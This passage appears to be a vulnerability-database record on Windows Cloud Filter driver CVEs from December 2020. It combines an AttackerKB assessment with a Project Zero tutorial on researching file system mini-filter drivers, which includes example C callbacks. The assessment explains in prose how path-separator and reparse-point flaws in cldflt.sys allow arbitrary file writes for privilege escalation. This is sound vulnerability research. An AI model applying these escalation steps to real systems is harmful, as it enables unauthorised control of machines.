"AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17095"], "modified": "2020-12-08T08:00:00", "id": "MS:CVE-2020-17095", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17095", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2021-07-20T20:11:25", "description": "Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2020-17103, CVE-2020-17134.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at December 15, 2020 7:34pm UTC reported:\n\nA nice little LPE technique which takes advantage of several issues as originally noted by James Forshaw at <https://bugs.chromium.org/p/project-zero/issues/detail?id=2082>. In particular, by running a program that communicates with the kernel via the `CfCreatePlaceholders` API, an attacker can exploit an issue within the cloud filter driver `cldflt.sys`, which runs in kernel mode, whereby placeholder files are not handled appropriately.\n\nAs James mentions within his writeup, several issues occur within `cldflt.sys` when creating placeholder files, which are described below:\n\n 1. The FSCTL control code which is sent to the kernel mode filter driver to instruct it to create the placeholder file will result in the filter driver calling `FltCreateFileEx()` without specifying the `IO_FORCE_ACCESS_CHECK` or `OBJ_FORCE_ACCESS_CHECK` flags to force access checks to occur. As calling `FltCreateFileEx()` effectively calls `IoCreateFileEx()` with the `IO_NO_PARAMETER_CHECKING` flag set. \n\n\nFor more details on these parameters see <https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-iocreatefile> which notes that if `IO_NO_PARAMETER_CHECKING` is used, the parameters are not probed to see if they reside in user mode memory or cause access violations. Looking at <https://docs.microsoft.com/en-us/windows/win32/api/ntdef/ns-ntdef-_object_attributes> also shows that the `OBJ_FORCE_ACCESS_CHECK` flag will enforce the permission checking of an object prior to using it even if the handle is being opened in kernel mode.\n\nSo effectively what is happening is that cause these flags are not being specified, the kernel is implicitly trusting the user\u2019s input and failing to perform appropriate access checks prior to performing the file operation in kernel mode on the user\u2019s behalf.\n\n 1. The cloud driver takes in a path which is split up into a base sync path, which is checked for write access, and a filename component, which isn\u2019t checked for path separators. So you can specify one base sync path but multiple path separators in the filename component and essentially trick Windows into thinking that you are writing to one directory that you have write access to, whereas in reality you are writing to a subdirectory of that directory that you might not normally have write access to (again remember that the access checks will be bypassed due to the write operation occurring with KeMode privileges).\n\n 2. Whilst the call to `FltCreateFileEx()` uses the `FILE_OPEN_REPARSE_POINT` to block directly accessing a reparse point, that only prevents it from attempting to access a mount point directly. If you instead create a subdirectory within the mount point and point it at that instead, it will still access the mount point, allowing you to write the file anywhere you would like.\n\nCombining this all together one can create an exploit that either a) Uses an existing directory that we have write permissions to, and then using the permission check error and the directory path error, we can write a file to one of the subdirectories we wouldn\u2019t normally have access to, or one can use the reparse point bug instead to write a file to anywhere on the system.\n\nMicrosoft patched this bug in December 2020 by changing the `HsmpOpCreatePlaceholders()` function in `cldflt.sys` to add additional checks. I have only done a preliminary inspection of this function but it appears that there are some new checks for the path, specifically r.e the use of `\\` characters, and a few jumps were changed in their logic. Unfortunately as the function is rather large at 190 blocks and I don\u2019t have the time to dive into this in depth right now this is as much as I was able to confirm. I also found that if you run the exploit on a patched system you will now get the error message: `System.Runtime.InteropServices.COMException (0x8007017C): The cloud operation is invalid. (Exception from HRESULT: 0x8007017C)`, which was not returned previously when attempting to run the PoC from James Forshaw.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-10T00:00:00", "type": "attackerkb", "title": "CVE-2020-17136", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17103", "CVE-2020-17134", "CVE-2020-17136"], "modified": "2021-02-22T00:00:00", "id": "AKB:33F83CEA-850A-43CD-8CA4-D0DC548F1958", "href": "https://attackerkb.com/topics/1yvp3hVNSN/cve-2020-17136", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "googleprojectzero": [{"lastseen": "2021-01-15T07:41:52", "description": "Posted by James Forshaw, Project Zero\n\nIn December Microsoft fixed 4 issues in Windows in the Cloud Filter and Windows Overlay Filter (WOF) drivers ([CVE-2020-17103](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2086>), [CVE-2020-17134](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2084>), [CVE-2020-17136](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2082>), [CVE-2020-17139](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2088>)). These 4 issues were 3 local privilege escalations and a security feature bypass, and they were all present in Windows file system filter drivers. I\u2019ve found a number of issues in filter drivers previously, including 6 in the LUAFV driver which implements UAC file virtualization.\n\nThe purpose of a file system filter driver according to [Microsoft](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/about-file-system-filter-drivers>) is:\n\n\u201cA file system filter driver can filter I/O operations for one or more file systems or file system volumes. Depending on the nature of the driver, filter can mean log, observe, modify, or even prevent. Typical applications for file system filter drivers include antivirus utilities, encryption programs, and hierarchical storage management systems.\u201d\n\nWhat this boils down to is the filter driver can inspect and modify almost any IO request sent to a file system. This power comes with many responsibilities, and considering the complexity of the IO model on Windows it can be hard to avoid introducing subtle bugs.\n\nWith the issues being fixed I thought would be a good opportunity to go into a bit more detail on how you can research file system filter drivers, specifically the kind of things I looked at to find my security vulnerabilities. I\u2019m going to give an overview of how filter drivers work, how you communicate with them, some hints on reverse engineering and some of the common security issues you might discover. I\u2019ll also provide some basic example code to give you a basic idea of some common coding patterns. The goal is to allow you to do your own research in this area.\n\nI\u2019m assuming you have some prior knowledge on how the IO Manager works and have experience in finding security issues in non-filter drivers. Also I\u2019m not claiming this to be an exhaustive description of bug hunting in filter drivers as the topic is very deep and complex. With this in mind let\u2019s start with an overview of how a filter driver works.\n\n## Filter Driver Implementation\n\nA filter driver exploits the way the Windows IO Manager implements file system drivers. When you make a request to access a file, such as calling the NtCreateFile system call the IO Manager allocates an IO Request Packet (IRP) structure which contains the operation type and all the parameters for the operation. The IRP is then dispatched to the top of the device stack associated with the request.\n\n[](<https://1.bp.blogspot.com/-ft1Qb-E9rrA/X_9xlhIu_EI/AAAAAAAAaog/B0AV8WsW5wQrUX17mHfM11ku8zUik-7xwCNcBGAsYHQ/s653/Device%2BStack.png>)\n\nA filter driver registers for the IO requests it supports with a callback function which is invoked when a specific IO request type IRP is queued in the device stack. The driver callback can then do a number of different things to the IRP.\n\n * Pass the IRP unmodified directly to the next driver in the stack.\n * Modify the IRP then pass to the next driver.\n * Modify the IRP response.\n * Complete the IRP operation with a success result.\n * Complete the IRP operation with an error result.\n * Pass the IRP to a different device stack.\n\nThis is the basics of how a filter driver works, the driver is attached at a suitable point of a device stack and handles IO requests. When an IRP of interest is received it can perform one of the operations to filter requests. If it wants to inspect or modify the response it can register for the completion routine and handle the operation in the callback.\n\nIt\u2019s important to note that the IRP doesn\u2019t automatically propagate down the stack. A driver can choose to complete the IRP which means it\u2019ll not be processed by any other driver down the stack. If the driver passes on the IRP the driver must register a completion routine otherwise it\u2019ll not be notified when the IRP has been processed by the lower drivers in the stack. \n\nFor a file system filter the insertion point would typically be on top of the file system device object which is exposed by a file system driver such as NTFS. However, the driver can insert itself almost anywhere, allowing it to filter not just file system requests but also change data such as disk sectors. For example the Bitlocker Full Disk Encryption driver is a filter which is attached to the top of a volume block device. Any sectors passed in a write IRP are encrypted before passing to the lower driver. Read IRPs are handled in a completion routine and the sectors are decrypted before returning to the caller.\n\n## The Filter Manager and Mini-Filters\n\nImplementing a filter driver from scratch is quite complicated. You have to handle every single IO request type, even if you don\u2019t care about it, so that it can be forwarded to the next driver in the stack. You also have to find the correct point to insert your filter driver into the device stack. It\u2019s easy to attach a driver to the top of the stack but trying to insert in the middle of an existing stack can be a recipe for disaster, for example the ordering of the filter drivers in the stack might differ depending on load order.\n\nTo make it easier to write a filter driver Windows comes with the [Filter Manager Driver](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/filter-manager-concepts#:~:text=The%20filter%20manager%20is%20a,in%20file%20system%20filter%20drivers.&text=The%20filter%20manager%20is%20installed,a%20minifilter%20driver%20is%20loaded.>) which takes care of handling IO requests and device stacks. This allows a developer to write what\u2019s called a mini-filter driver instead of a, now named, legacy filter driver. The following diagram shows how the architecture changes when you introduce the filter manager.\n\n[](<https://1.bp.blogspot.com/-4xN5FEYoyic/X_9xllA7a3I/AAAAAAAAaok/l8-pMXurJsAmRY6N-2yt_6kPNk9ZnvtXQCNcBGAsYHQ/s820/Mini-Filter%2BDriver.png>)\n\nAs you can see the mini-filters don\u2019t add their own device objects to the stack. Instead they are registered with the filter manager and it\u2019s the filter manager which inserts its own device. The filter manager handles the IO requests and calls registered mini-filters to process the request. If your mini-filter doesn\u2019t support a certain IO request then the filter manager implements a default which handles passing the IRP on to the next driver in the stack.\n\nAnother useful feature is the filter manager implements a mechanism for ordering the mini-filters, through an altitude value. The higher the altitude value the higher the priority. For example, a filter at altitude 10000 will be called before a filter at altitude 5000 when making a IO request. When handling responses the altitudes processed in reverse order, so the filter at 5000 will be called first then the one at 10000. Officially the altitude values must be [registered](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/minifilter-altitude-request>) with Microsoft. MSDN contains a [list of the currently registered altitudes](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/allocated-altitudes>). However, there\u2019s nothing to stop a driver from registering itself with a different altitude except it\u2019ll likely draw the ire of Microsoft and might fail certification. By formalizing the altitude values you avoid the risk that a filter driver\u2019s ordering may change depending on load order.\n\n## Mini-Filter Registration\n\nA mini-filter driver registers its presence by calling the [FltRegisterFilter](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nf-fltkernel-fltregisterfilter>) filter manager API, normally during the driver\u2019s entry point. The main parameter is a [FLT_REGISTRATION](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/ns-fltkernel-_flt_registration>) structure which defines all the various callbacks for handling IO requests and bookkeeping. The important fields are the callbacks which a driver can register to respond to events from the filter manager. You can view what filters are registered with the filter manager using the fltmc command line tool (must be run as an administrator).\n\nC:\\&gt; fltmc\n\nFilter Name Num Instances Altitude Frame\n\n\\------------------------------ ------------- ------------ -----\n\nbindflt 1 409800 0\n\nWdFilter 17 328010 0\n\nstorqosflt 1 244000 0\n\nwcifs 0 189900 0\n\nCldFlt 0 180451 0\n\nFileCrypt 0 141100 0\n\nluafv 1 135000 0\n\nnpsvctrig 1 46000 0\n\nWof 14 40700 0\n\nFileInfo 17 40500 0 \n \n--- \n \nWe can see all the mini-filters registered, the number of instances which indicates the number of volumes that\u2019s been attached and the altitude. There are 19 volumes available for filtering in the system I tested on (according to running fltmc volumes) so no filter is attached to everything. A driver can select and decide what volumes it wants to attach to by assigning an [instance setup callback](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nc-fltkernel-pflt_instance_setup_callback>) to the InstanceSetupCallback field in the filter registration structure. This callback is invoked for every volume on the system, including new ones added after the filter starts. The callback can return the status code STATUS_FLT_DO_NOT_ATTACH to block attachment. \n\nYou can view what volumes a filter is attached to using fltmc again:\n\nC:\\&gt; fltmc instances -f luafv\n\nInstances for luafv filter:\n\nVolume Name Altitude Instance Name Frame VlStatus\n\n\\------------- ------------ ---------------------- ----- --------\n\nC: 135000 luafv 0 \n \n--- \n \nThis just shows the volume that LUAFV is attached to. As UAC virtualization only makes sense in the context of the system drive then it\u2019s only attached to C:. You can manually attach and detach filters on volumes using the fltmc tool with the attach and detach commands, we\u2019ll show an example of using these commands later.\n\nNOTE: Just because a filter driver is attached to a volume it doesn\u2019t mean it\u2019ll filter any IO requests for that volume. For example, the WOF driver is attached to all NTFS volumes, however it\u2019ll only enable itself if there\u2019s at least one file in the volume which is registered to be handled by WOF. Otherwise it ignores the IO request, letting it complete normally.\n\nMost mini-filters only attach to file system volumes. However, the filter manager also supports attaching to the named pipe and mailslot devices. The filter driver indicates support by setting the FLTFL_REGISTRATION_SUPPORT_NPFS_MSFS flag in the FLT_REGISTRATION structure.\n\n## Mini-Filter IO Request Operation Callbacks\n\nBy far the most important field in the FLT_REGISTRATION structure is OperationRegistration which references a list of [FLT_OPERATION_REGISTRATION](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/ns-fltkernel-_flt_operation_registration>) structures defining the IO request callbacks. Each entry contains the IRP major code for the operation (such as IRP_MJ_CREATE or IRP_MJ_FILE_SYSTEM_CONTROL) and can have a pre-request and post-request callback. The driver doesn\u2019t need to specify both if it doesn\u2019t need both. The list is a variable length array, terminated with the major code being set to IRP_MJ_OPERATION_END (0x80). Any operation not in the list is handled by the filter manager which typically just ignores it and continues to the next filter in the list. A basic example of what you might see in C code is shown below.\n\nconst FLT_OPERATION_REGISTRATION Callbacks[] = {\n\n{ IRP_MJ_CREATE,\n\n0,\n\nPreCreateOperation,\n\nPostCreateOperation },\n\n{ IRP_MJ_OPERATION_END }\n\n}; \n \n--- \n \nA [pre-request callback](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nc-fltkernel-pflt_pre_operation_callback>) accepts three parameters:\n\n * The parameters for the operation, specified in a [FLT_CALLBACK_DATA](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/ns-fltkernel-_flt_callback_data>) structure.\n * Related kernel objects, in a [FLT_RELATED_OBJECTS](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/ns-fltkernel-_flt_related_objects>) structure.\n * An output pointer which can be assigned a callback context.\n\nThe prototype of the callback function pointer is:\n\ntypedef FLT_PREOP_CALLBACK_STATUS\n\n(*PFLT_PRE_OPERATION_CALLBACK) (\n\nPFLT_CALLBACK_DATA Data,\n\nPCFLT_RELATED_OBJECTS FltObjects,\n\nPVOID *CompletionContext\n\n); \n \n--- \n \nThe parameters for the IO request are accessible in the FLT_CALLBACK_DATA structure\u2019s Iopb field which is an [FLT_IO_PARAMETER_BLOCK](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/ns-fltkernel-_flt_io_parameter_block>) structure. The parameters are similar to the ones exposed through the IRP\u2019s current [IO_STACK_LOCATION](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/ns-wdm-_io_stack_location>) structure. The data parameter also contains the [IO_STATUS_BLOCK](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/ns-wdm-_io_status_block>) for the request and the caller\u2019s requestor mode (either KernelMode or UserMode). The return code from the pre-request callback function determines what the filter driver wants to do with the request. The return type FLT_PREOP_CALLBACK_STATUS can be one of the following:\n\nName\n\n| \n\nValue\n\n| \n\nDescription \n \n---|---|--- \n \nFLT_PREOP_SUCCESS_WITH_CALLBACK\n\n| \n\n0\n\n| \n\nThe callback was successful. Pass on the IO request and get a post-operation callback after completion. \n \nFLT_PREOP_SUCCESS_NO_CALLBACK\n\n| \n\n1\n\n| \n\nThe callback was successful. Pass on the IO request. No callback required. \n \nFLT_PREOP_PENDING\n\n| \n\n2\n\n| \n\nMark the IO operation as pending. \n \nFLT_PREOP_DISALLOW_FASTIO\n\n| \n\n3\n\n| \n\nIf handling a Fast IO operation, fail it to force the operation as a normal IO Request. \n \nFLT_PREOP_COMPLETE\n\n| \n\n4\n\n| \n\nThe operation has been completed. Do not pass on the IO request to any other drivers, even other filters in the stack. \n \nFLT_PREOP_SYNCHRONIZE\n\n| \n\n5\n\n| \n\nSynchronize the post-operation callback in the same thread. \n \nFLT_PREOP_DISALLOW_FSFILTER_IO\n\n| \n\n6\n\n| \n\nDisallow FastIO file creation. \n \nA [post-request callback](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nc-fltkernel-pflt_post_operation_callback>) accepts four parameters:\n\n * The parameters for the operation, specified in a [FLT_CALLBACK_DATA](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/ns-fltkernel-_flt_callback_data>) structure.\n * Related kernel objects, in a [FLT_RELATED_OBJECTS](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/ns-fltkernel-_flt_related_objects>) structure.\n * A context pointer which could have been assigned by the pre-operation callback.\n * Additional flags.\n\nFor post-operation callbacks the prototype is as follows:\n\ntypedef FLT_POSTOP_CALLBACK_STATUS\n\n(*PFLT_POST_OPERATION_CALLBACK) (\n\nPFLT_CALLBACK_DATA Data,\n\nPCFLT_RELATED_OBJECTS FltObjects,\n\nPVOID CompletionContext,\n\nFLT_POST_OPERATION_FLAGS Flags\n\n); \n \n--- \n \nThe parameters are more or less the same as for the pre-operation callback. The CompletionContext parameter is the same one assigned in the pre-operation callback. If this value was allocated the post-operation callback needs to free the memory buffer to prevent leaking memory. The FLT_POSTOP_CALLBACK_STATUS return type can be one of the following values.\n\nName\n\n| \n\nValue\n\n| \n\nDescription \n \n---|---|--- \n \nFLT_POSTOP_FINISHED_PROCESSING\n\n| \n\n0\n\n| \n\nThe callback was successful. No further processing required. \n \nFLT_POSTOP_MORE_PROCESSING_REQUIRED\n\n| \n\n1\n\n| \n\nHalts completion of the IO request. The operation will be pending until the filter driver completes it. \n \nFLT_POSTOP_DISALLOW_FSFILTER_IO\n\n| \n\n2\n\n| \n\nDisallow FastIO file creation. \n \n## Handling IO Requests\n\nNow that we\u2019ve described registration of the mini-filter and its callbacks let's go through a few examples of how IO requests are handled inside the pre and post operation callbacks. We\u2019ll use the six operations I mentioned earlier as a base for this discussion. Any examples are to demonstrate the likely code you\u2019ll find in a driver but omits security checks and other unimportant details. This isn\u2019t Stack Overflow, so please don\u2019t copy and paste them into real drivers.\n\n### Pass the IO request unmodified\n\nThe simplest way of not modifying an IO request is to not specify a pre-operation callback. Of course we\u2019re assuming the driver wants to handle an IO request selectively based on certain criteria so it must implement the callback. \n\nThe easiest way to ignore the IO request is to return the FLT_PREOP_SUCCESS_NO_CALLBACK status code from the pre-operation callback. That indicates to the filter manager that the mini-filter has completed its processing and is no longer interested in the IO request.\n\nTo give an example the following pre-create operation callback will ignore any open requests where the desired access does not request the FILE_WRITE_DATA access right. If the request doesn\u2019t contain the access then the request is completed with no callback.\n\nFLT_PREOP_CALLBACK_STATUS\n\nPreCreateOperation(\n\nPFLT_CALLBACK_DATA Data,\n\nPCFLT_RELATED_OBJECTS FltObjects,\n\nPVOID* CompletionContext\n\n) {\n\nPFLT_IO_PARAMETER_BLOCK ps = &amp;Data-&gt;Iopb-&gt;Parameters;\n\nDWORD access = ps-&gt;Create.SecurityContext-&gt;DesiredAccess;\n\nif ((access &amp; FILE_WRITE_DATA) == 0) {\n\nreturn FLT_PREOP_SUCCESS_NO_CALLBACK;\n\n}\n\n// Perform some operation...\n\n} \n \n--- \n \nThe example extracts the desired access from the creation parameters. If the FILE_WRITE_DATA access right is not set then the filter driver will ignore the IO request entirely by returning the no callback status code.\n\nOf course depending on the purpose of the filter driver it might still want the post-operation callback to be called. For example if the filter driver is monitoring file access then the post-operation callback will contain valuable information such as the success or failure of opening the file or the data read from the file. In this case it makes sense to return FLT_PREOP_SUCCESS_WITH_CALLBACK.\n\nWhen the driver specified it wants a post-operation callback it can configure the CompletionContext with any value it likes. This context can then be used in the post-operation callback. This can be used to pass additional data between the callbacks so that it can perform its operation correctly.\n\n### Modify the IO request\n\nDuring a pre-operation callback the driver can modify the contents of the FLT_CALLBACK_DATA structure. For example the driver could change the security context used to open the file or it could even change the name of the file itself. The driver must indicate to the filter manager that the data has been modified by setting the FLTFL_CALLBACK_DATA_DIRTY flag in the Flags field before returning. The correct way of setting the flag is to call the [FltSetCallbackDataDirty](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nf-fltkernel-fltsetcallbackdatadirty>) API however all that currently does is set the flag.\n\n### Modify the IO request response\n\nAs with the request you can modify the response in the post-operation callback which will return the changes to higher mini-filters and the IO manager. One trick I\u2019ve commonly seen is to use this to change the target file by modifying the file name and returning the status code STATUS_REPARSE as if the file system hand encountered a symbolic link. The following is the basic approach that the LUAFV driver uses to perform the reparse operation to an arbitrary file path in a post-operation callback.\n\nFLT_POSTOP_CALLBACK_STATUS LuafvReparse(PFLT_CALLBACK_DATA Data,\n\nPUNICODE_STRING TargetFileName){\n\nLuafvSetEcp(Data, TargetFileName);\n\nPFILE_OBJECT FileObject = Data-&gt;Iopb-&gt;TargetFileObject;\n\nExFreePool(FileObject-&gt;FileName.Buffer);\n\nFileObject-&gt;FileName.Buffer = ExAllocatePool(PagedPool,\n\nTargetFileName.Length);\n\nFileObject-&gt;FileName.MaximumLength = TargetFileName.Length;\n\nRtlCopyUnicodeString(&amp;FileObject-&gt;FileName, TargetFileName);\n\nData-&gt;IoStatus.Information = 0;\n\nData-&gt;IoStatus.Status = STATUS_REPARSE;\n\nFltSetCallbackDataDirty(Data);\n\nreturn FLT_POSTOP_FINISHED_PROCESSING;\n\n} \n \n--- \n \nThe code deallocates the filename buffer in the target file object and replaces it with its own. It then sets the status code to STATUS_REPARSE and indicates that processing has finished. In Windows 7 a [IoReplaceFileObjectName](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ioreplacefileobjectname>) API was introduced which makes this operation much less error prone, however LUAFV was written for Vista where the API didn\u2019t exist so it had to make do. An official Microsoft example can be found in the [SimRep sample driver](<https://github.com/microsoft/Windows-driver-samples/blob/master/filesys/miniFilter/simrep/simrep.c>).\n\nOne quirk of this operation is the FileName in the file object is volume relative, e.g. if you opened c:\\windows\\notepad.exe then FileName is set to \\windows\\notepad.exe. However, you can replace that with an absolute path such as \\??\\d:\\abc.txt and that still works. Also the driver doesn\u2019t need to create a real mount point or symbolic link reparse point buffer for this to work. The IO manager will just take the path from the file object and restart the create request with the new path.\n\n### Complete the IO request with a success result\n\nThe driver can immediately complete an IO request by returning FLT_PREOP_COMPLETE from a pre-operation callback and updating the IO_STATUS_BLOCK in the FLT_CALLBACK_DATA parameter. The previous reparse example shows how that update works. If you\u2019re only updating the IO_STATUS_BLOCK you don\u2019t need to mark the data as dirty.\n\nHigher level filter drivers will still get their post-operation callbacks invoked if they\u2019re registered for them, however no lower altitude drivers will be called with the IO request.\n\n### Complete the IO request with an error result.\n\nThis is basically the same as for a success code, just specifying a different NT status. There\u2019s nothing stopping a higher level filter driver from ignoring the error code and replacing it with a success. \n\n### Pass the IO request to a different file or device stack\n\nThe filter driver can redirect the operation to another device stack. For example you could implement a driver which redirects file reads and writes to a completely different file on the disk, making it look like the user is modifying the file when they\u2019re not.\n\nThe most obvious way of achieving this would be to open the new file during the pre-create operation then use that file object as the target for all subsequent operations. There are two potential issues with this approach.\n\nFirst, how can a filter driver interact with a file system volume it\u2019s attached to without resulting in an infinite loop? For example, if the driver wants to open a file it can call [IoCreateFile](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-iocreatefile>) (and variants). However, the IO manager would dispatch the IO request to the top of the device stack, which would get back to the filter manager which could end up calling the filter driver again, ad infinitum. The same would be the case with any exported APIs from the kernel.\n\nThis issue is solved through two mechanisms. The first is the filter manager exposes a set of APIs which mirror the kernel IO APIs but will only dispatch the IO request to filters below the caller. For example you can call [FltCreateFileEx](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nf-fltkernel-fltcreatefileex>) or [FltWriteFile](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nf-fltkernel-fltwritefile>) and be sure you won\u2019t end up in a loop. \n\nFor file creation requests the driver can also employ a second mechanism called Extra Create Parameters (ECP). An ECP is a GUID along with additional data which can be attached to the create request using the [FltInsertExtraCreateParameter](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nf-fltkernel-fltinsertextracreateparameter>) API. The filter driver can attach the ECP to the request, then check for its presence using [FltFindExtraCreateParameter](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nf-fltkernel-fltfindextracreateparameter>) API, allowing it to ignore the request. For example the earlier code which shows how LUAFV implements a reparse operation shows calling LuafvSetEcp which sets an ECP on the request so that the new create request can be ignored by the driver.\n\nThe second issue is how do you actually pass on the parameters for the IO request to the new file you\u2019ve opened? The naive approach would be to extract the parameters then invoke the corresponding filter manager API. For example, for a write IO request, read out the buffer and length then call FltWriteFile. This is error prone and might introduce subtle security issues.\n\nA better approach is the driver can change the TargetFileObject field in the pre-operation callback\u2019s FLT_IO_PARAMETER_BLOCK structure then return a success code for the IO request to continue. This will cause the filter manager to send the original IO request to the new file object. The following is a simple example which could be in a pre-operation callback which will redirect the request to a file object extracted from the file system context:\n\nPREDIRECT_CONTEXT context = // Get driver\u2019s allocated context.\n\nif (context-&gt;FileObject) {\n\nData-&gt;Iopb-&gt;TargetFileObject = context-&gt;FileObject;\n\nFltSetCallbackDataDirty(Data);\n\nreturn FLT_PREOP_SUCCESS_NO_CALLBACK;\n\n} \n \n--- \n \n## Mini-Filter Communication\n\nFor there to be a security vulnerability the driver must process some untrustworthy data from a malicious user. What makes mini-filter drivers interesting is there's multiple places where untrusted data can be processed. Let\u2019s go through the ways of identifying and analyzing these communication channels.\n\n### Device Object\n\nA mini-filter doesn\u2019t need to create any device object to perform its function, the filter manager deals with creating any necessary device objects. That doesn\u2019t mean the driver can\u2019t create one for its own purposes. A typical attack vector is the malicious user opens a handle to the device object and sends device IO control codes to exercise the vulnerable behavior.\n\nI\u2019m not going to go into details about how to analyze Windows kernel drivers for security issues in the IRP dispatch callbacks, as there\u2019s plenty of other resources. For example: Reverse Engineering and Bug Hunting on KMDF Drivers ([video](<https://www.youtube.com/watch?v=puNkbSTQtXY>), [slides](<https://ioactive.com/wp-content/uploads/2018/09/Reverse_Engineering_and_Bug_Hunting_On_KMDF_Drivers.pdf>)).\n\n### Filter Communication Ports\n\nOne unique communication mechanism which is implemented by the filter manager is Filter Communication Ports. A port can be created by a mini-filter driver by calling the exported filter manager API [FltCreateCommunicationPort](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nf-fltkernel-fltcreatecommunicationport>).\n\nPSECURITY_DESCRIPTOR SecurityDescriptor;\n\nFltBuildDefaultSecurityDescriptor(\n\n&amp;SecurityDescriptor,\n\nFLT_PORT_ALL_ACCESS\n\n);\n\nUNICODE_STRING Name;\n\nRtlInitUnicodeString(&amp;Name, L\"\\\\\\FilterPortName\");\n\nOBJECT_ATTRIBUTES ObjAttr;\n\nInitializeObjectAttributes(&amp;ObjAttr, &amp;Name, 0, NULL, SecurityDescriptor);\n\nPFLT_PORT Port;\n\nFltCreateCommunicationPort(\n\nFilter,\n\n&amp;Port,\n\n&amp;ObjAttr,\n\nNULL,\n\nConnectNotifyCallback,\n\nDisconnectNotifyCallback,\n\nMessageNotifyCallback,\n\n100\n\n); \n \n--- \n \nThe name of the port is specified using an [OBJECT_ATTRIBUTES](<https://docs.microsoft.com/en-us/windows/win32/api/ntdef/ns-ntdef-_object_attributes>) structure, in this example the filter port will be called \\FilterPortName in the Object Manager Namespace (OMNS). The driver should also specify the security descriptor to be associated with the port through the OBJECT_ATTRIBUTES. It\u2019s most common to call the [FltBuildDefaultSecurityDescriptor](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nf-fltkernel-fltbuilddefaultsecuritydescriptor>) API to build a security descriptor which only grants administrators access to the port. However, the driver can configure the security any way it likes.\n\nIn FltCreateCommunicationPort the filter manager creates a new named kernel object of type FilterConnectionPort with the OBJECT_ATTRIBUTES and associates it with the callbacks. There\u2019s no NtOpenFilterConnectionPort system call to open a port. Instead when a user wants to access the port it must first open a handle to the filter manager message device object, \\FileSystem\\Filters\\FltMgrMsg, passing an extended attributes structure identifying the full OMNS path to the port. \n\nIt is much easier to open a port by calling the [FilterConnectCommunicationPort](<https://docs.microsoft.com/en-us/windows/win32/api/fltuser/nf-fltuser-filterconnectcommunicationport>) API in user-mode, so you don\u2019t need to deal with connecting manually. When opening a port you can also specify an arbitrary context buffer to pass to the connect callback. This can be used to configure the open port instance. On connection the connect notification callback passed to FltCreateCommunicationPort will be called. The prototype for the callback is as follows:\n\ntypedef NTSTATUS\n\n(*PFLT_CONNECT_NOTIFY) (\n\nPFLT_PORT ClientPort,\n\nPVOID ServerPortCookie,\n\nPVOID ConnectionContext,\n\nULONG SizeOfContext,\n\nPVOID *ConnectionPortCookie\n\n); \n \n--- \n \nThe ConnectionContext and SizeOfContext are values passed from user-mode when calling FilterConnectCommunicationPort. The ConnectionContext has its length verified and copied into kernel memory before use. However, there\u2019s no structure for the context so the driver must still carefully verify its contents before using it. The driver can reject a caller by returning an error NT 